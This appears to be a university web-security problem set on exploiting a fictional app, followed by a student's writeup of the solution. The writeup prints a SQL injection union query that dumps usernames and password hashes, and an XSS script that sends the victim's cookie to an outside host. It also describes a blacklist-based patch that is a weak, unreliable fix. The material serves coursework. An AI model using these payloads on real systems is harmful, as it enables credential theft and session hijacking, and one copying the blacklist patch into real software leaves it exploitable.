The goal of this problem set is to exploit a fictional web application. First, you will need to gain access to the application as an authenticated user. Then, you will need to deanonymize the administrator. Finally, you will need to patch the vulnerabilities used to exploit the application. To complete the problem set, you will need to ssh to your container at $user[@]$port , where $user is your gitlab username and $port is your assigned ssh port (hxxps:// Authentication is performed using any of your uploaded ssh public keys in gitlab. You will also need to clone the problem set repository located at git[@] .
The target application is running on port 3000 on your container. To access the application, you can use ssh to forward a local port on your machine to the container port 3000 using the -L option. For instance:
# From a shell
$ ssh -A -L3000:localhost:3000 -i $path_to_ssh_private_key -p $ssh_port $user[@]
# From your browser, access hxxp://localhost:3000/
See man ssh(1) for more information on port forwarding. You will be presented with a login page. Locate a SQL injection vulnerability in the source code of the application. Exploit this vulnerability to obtain pairs of password hashes and usernames for the application.
The hashes you obtained in the previous step were created using a known-insecure algorithm. Study the source code of the application to identify the hashing algorithm. Write a program to crack at least one hash out of those you recovered in order to authenticate to the application. The recommended approach is to perform a brute-force search of the space of possible passwords. A clue to reducing the search space can be found in the application source code. The use of existing password crackers like John the Ripper, hashcat, or others is not permitted for this problem.
After gaining access to the application, your next goal is to deanonymize the administrator. To accomplish this, locate and exploit a XSS vulnerability to inject content that will result in the administrator issuing a request to a web server that you control when the administrator visits the application. Record the administrator’s IP address as well as a secret token that is embedded in a cookie. To receive the request, you will need to set up a web application of your own that is accessible to the administrator. Feel free to use the framework of your choice (e.g., Flask ( Port 5000 will be exposed on your container; running your application on that port will allow the administrator to access your application. The administrator will visit your application every few minutes.
Fork the repository for this problem set in gitlab – your copy should have the URL git[@]$user/prset02.git . Develop a patch to the original source files that removes the SQL injection and XSS vulnerabilities while preserving the intended functionality of the program. Commit the patch to your repository (i.e., edit the original source code and commit the changed version).
In your forked repository, commit a JSON object to solution.json with the following format:
"user_hash": "<user's hashed password>",
"user_password": "<user's cracked password>",
"admin_addr": "<admin IP address>",
"admin_secret": "<admin secret value from cookie>"
You are responsible for submitting valid JSON at the correct path. Use a validator if you’re unsure about this, and double-check that your JSON follows the format above exactly. In addition, commit the following source code to the specified locations: Your password cracker to cracker/ Your XSS exploit to xss/ Your deanonymization application to deanonymize/ Finally, commit a that describes the vulnerabilities, your exploits, and how your patch fixes the vulnerabilities. Push all commits to gitlab.
Crack all of the user accounts and compute the size of the password space for this application. To receive credit, add the following fields to your solution.json submission:
// original fields omitted...
"password_space": <size of password space as an integer>,
"passwords": [
"username": "<user's username>",
"password": "<user's password>"
// ...
As usual, make sure that the resulting solution.json is valid JSON.
- There is SQL Injection vulnerability in the web application which allows users to insert malicious scripts and get unauthorized information from the database
- There is another vulnerability which is Cross Site Scripting (XSS) one. With this vulnerability the attacker can insert the malicious javascripts and get the important information like the cookie. With cookie the the attacker login as a valid user and perform malicious activity
- To perform the exploit with SQL Injection I entered queries like
" ' union select 1, 2, group_concat(username, passwd), 4, 5 from users --"
The query outputs all combinations of the usernames and passwords as output to the status message on the login page
- To perform the exploit with XSS I entered the following javascript to redirect the user to another fake webpage and send out the cookie value as parameter to fake webpage
" <script> window.location.href="hxxp://"+document.cookie </script>"
The patch for both the vulnerabilities is almost same. I performed the user input validation and removed possibility of the bad input by checking the user entered data. I converted the user input to string and then checked for characters like ['], ["], [,], [<], [>]. If such characters are present in the user input I simply discarded the input
Please find the password cracker saved to cracker/ directory, XSS exploit to xss/ directory, deanonymization application to deanonymize/ directory and solution.json in the root directory of this repository. Thank you!